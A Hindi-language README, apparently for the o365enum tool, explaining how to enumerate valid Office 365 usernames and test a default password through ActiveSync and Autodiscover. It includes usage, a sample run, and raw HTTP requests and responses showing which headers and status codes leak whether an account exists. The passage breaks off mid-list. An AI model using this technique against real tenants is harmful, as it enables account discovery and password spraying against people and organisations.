
Office 365 से ActiveSync, Autodiscover v1, या office.com लॉगिन पृष्ठ का उपयोग करके मान्य उपयोगकर्तानामों की गणना करें।
ActiveSync, Autodiscover, या office.com लॉगिन पृष्ठ का उपयोग करके Office 365 से मान्य उपयोगकर्ता नामों की गणना करें।
o365enum पहले पैरामीटर के रूप में प्रदान की गई फ़ाइल से उपयोगकर्ता नाम पढ़ेगा। फ़ाइल में प्रति पंक्ति एक उपयोगकर्ता नाम होना चाहिए। आसान पार्सिंग के लिए आउटपुट CSV-आधारित है। मान्य स्थिति 0 (अमान्य उपयोगकर्ता), 1 (मान्य उपयोगकर्ता), 2 (मान्य उपयोगकर्ता और मान्य पासवर्ड) हो सकती है।
python3.6 o365enum.py -h
usage: o365enum.py [-h] -u USERLIST [-p PASSWORD] [-n NUM] [-v]
[-m {activesync,autodiscover,office.com}]
Office365 User Enumeration Script
optional arguments:
-h, --help show this help message and exit
-u USERLIST, --userlist USERLIST
username list one per line (default: None)
-p PASSWORD, --password PASSWORD
password to try (default: Password1)
-n NUM, --num NUM # of reattempts to remove false negatives (default: 3)
-v, --verbose Enable verbose output at urllib level (default: False)
-m {activesync,autodiscover,office.com}, --method {activesync,autodiscover,office.com}
method to use (default: activesync)
उदाहरण रन:
./o365enum.py -u users.txt -p Password2 -n 1 -m activesync
username,valid
[email protected],0
[email protected],1
यह विधि grimhacker की विधि पर आधारित है जो ActiveSync एंडपॉइंट पर बेसिक HTTP प्रमाणीकरण अनुरोध भेजती है। हालाँकि, स्टेटस कोड की जाँच करना अब काम नहीं करता क्योंकि Office365 उपयोगकर्ता के अस्तित्व में होने या न होने पर भी 401 लौटाता है।
इसके बजाय, हम वही अनुरोध भेजते हैं लेकिन यह पहचानने के लिए कि उपयोगकर्ता नाम मान्य है या नहीं, एक कस्टम HTTP प्रतिक्रिया हेडर (X-MailboxGuid) की उपस्थिति की जाँच करते हैं।
नीचे दिए गए अनुरोध में Authorization हेडर में निम्नलिखित Base64 एन्कोडेड क्रेडेंशियल्स शामिल हैं: [email protected]:Password1
OPTIONS /Microsoft-Server-ActiveSync HTTP/1.1
Host: outlook.office365.com
Connection: close
MS-ASProtocolVersion: 14.0
Content-Length: 0
Authorization: Basic dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE=
यह निम्नलिखित प्रतिक्रिया ("401 अनधिकृत") को X-MailboxGuid हेडर के साथ उत्पन्न करता है, जो दर्शाता है कि उपयोगकर्ता नाम मान्य है लेकिन पासवर्ड नहीं है:
Date: Fri, 31 Jan 2020 13:02:46 GMT
Connection: close
HTTP/1.1 401 Unauthorized
Content-Length: 1293
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: d494a4bc-3867-436a-93ef-737f9e0522eb
X-CalculatedBETarget: AM0PR09MB2882.eurprd09.prod.outlook.com
X-BackEndHttpStatus: 401
X-RUM-Validated: 1
X-MailboxGuid: aadaf467-cd08-4a23-909b-9702eca5b845 <--- यह हेडर खाते की स्थिति (मौजूदा) को लीक करता है
X-DiagInfo: AM0PR09MB2882
X-BEServer: AM0PR09MB2882
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 401
X-Powered-By: ASP.NET
X-FEServer: AM0PR06CA0096
WWW-Authenticate: Basic Realm="",Negotiate
Date: Fri, 31 Jan 2020 13:02:46 GMT
Connection: close
--snip--
नीचे दिए गए अनुरोध में Authorization हेडर में निम्नलिखित Base64 एन्कोडेड क्रेडेंशियल्स शामिल हैं: [email protected]:Password1
OPTIONS /Microsoft-Server-ActiveSync HTTP/1.1
Host: outlook.office365.com
Connection: close
MS-ASProtocolVersion: 14.0
Content-Length: 2
Authorization: Basic aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ==
यह निम्नलिखित प्रतिक्रिया ("401 अनधिकृत" लेकिन इस बार X-MailboxGuid हेडर के बिना) उत्पन्न करता है, जो दर्शाता है कि उपयोगकर्ता नाम अमान्य है।
HTTP/1.1 401 Unauthorized
Content-Length: 1293
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: 2944dbfc-8a1e-4759-a8a2-e4568950601d
X-CalculatedFETarget: DB3PR0102CU001.internal.outlook.com
X-BackEndHttpStatus: 401
WWW-Authenticate: Basic Realm="",Negotiate
X-FEProxyInfo: DB3PR0102CA0017.EURPRD01.PROD.EXCHANGELABS.COM
X-CalculatedBETarget: DB7PR04MB5452.eurprd04.prod.outlook.com
X-BackEndHttpStatus: 401
X-RUM-Validated: 1
X-DiagInfo: DB7PR04MB5452
X-BEServer: DB7PR04MB5452
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 401
X-FEServer: DB3PR0102CA0017
X-Powered-By: ASP.NET
X-FEServer: AM0PR04CA0024
Date: Fri, 31 Jan 2020 16:19:11 GMT
Connection: close
--snip--
Autodiscover एंडपॉइंट बिना प्रमाणीकरण प्रयास के उपयोगकर्ता गणना की अनुमति देता है। एंडपॉइंट 200 स्टेटस कोड लौटाता है यदि उपयोगकर्ता मौजूद है और 302 लौटाता है यदि उपयोगकर्ता मौजूद नहीं है (जब तक कि पुनर्निर्देशन ऑन-प्रिमाइसेस Exchange सर्वर पर न किया गया हो)।
GET /autodiscover/autodiscover.json/v1.0/[email protected]?Protocol=Autodiscoverv1 HTTP/1.1
Host: outlook.office365.com
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.12026; Pro
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
MS-ASProtocolVersion: 14.0
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 97
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
request-id: fee7f899-7115-43da-9d34-d3ee19920a89
X-CalculatedBETarget: AM0PR09MB2882.eurprd09.prod.outlook.com
X-BackEndHttpStatus: 200
X-RUM-Validated: 1
X-AspNet-Version: 4.0.30319
X-DiagInfo: AM0PR09MB2882
X-BEServer: AM0PR09MB2882
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 200
X-Powered-By: ASP.NET
X-FEServer: AM0PR0202CA0008
Date: Mon, 02 Mar 2020 12:50:48 GMT
Connection: close
{"Protocol":"Autodiscoverv1","Url":"https://outlook.office365.com/autodiscover/autodiscover.xml"}
GET /autodiscover/autodiscover.json/v1.0/[email protected]?Protocol=Autodiscoverv1 HTTP/1.1
Host: outlook.office365.com
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.12026; Pro
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
MS-ASProtocolVersion: 14.0
HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 277
Content-Type: text/html; charset=utf-8
Location: https://outlook.office365.com/autodiscover/autodiscover.json?Email=nonexistent%40contoso.com&Protocol=Autodiscoverv1&RedirectCount=1
Server: Microsoft-IIS/10.0
request-id: 1c50adeb-53ac-41b9-9c34-7045cffbae45
X-CalculatedBETarget: DB6PR0202MB2568.eurprd02.prod.outlook.com
X-BackEndHttpStatus: 302
X-RUM-Validated: 1
X-AspNet-Version: 4.0.30319
X-DiagInfo: DB6PR0202MB2568
X-BEServer: DB6PR0202MB2568
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 302
X-Powered-By: ASP.NET
X-FEServer: AM0PR0202CA0013
Date: Mon, 02 Mar 2020 12:50:50 GMT
Connection: close
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://outlook.office365.com/autodiscover/autodiscover.json?Email=nonexistent%40contoso.com&Protocol=Autodiscoverv1&RedirectCount=1">here</a>.</h2>
</body></html>
चेतावनी: यह विधि केवल उन संगठनों के लिए काम करती है जो Exchange Online के सब्सक्राइबर हैं और जिनके पास Exchange सर्वर का ऑन-प्रिमाइसेस या हाइब्रिड डिप्लॉयमेंट नहीं है।
उन कंपनियों के लिए जो ऑन प्रिमाइसेस Exchange सर्वर या कुछ हाइब्रिड डिप्लॉयमेंट का उपयोग करती हैं और कुछ कॉन्फ़िगरेशन के आधार पर जिसे मैंने अभी तक पहचाना नहीं है, सर्वर किसी भी उपयोगकर्ता नाम मान के लिए उपयोगकर्ता नाम मौजूद है यह दर्शाने वाला मान लौटा सकता है।
यह विधि तब उपयोगी होती है जब आप 'Password1' के साथ प्रमाणीकरण प्रयास नहीं करना चाहते :)
IfExistsResult प्रॉपर्टी का उपयोग यह बताने के लिए किया जाता है कि कोई खाता कैसे और क्या मौजूद है। जैसा कि इस RSM ब्लॉग लेख में चर्चा की गई है, मान इस प्रकार हैं: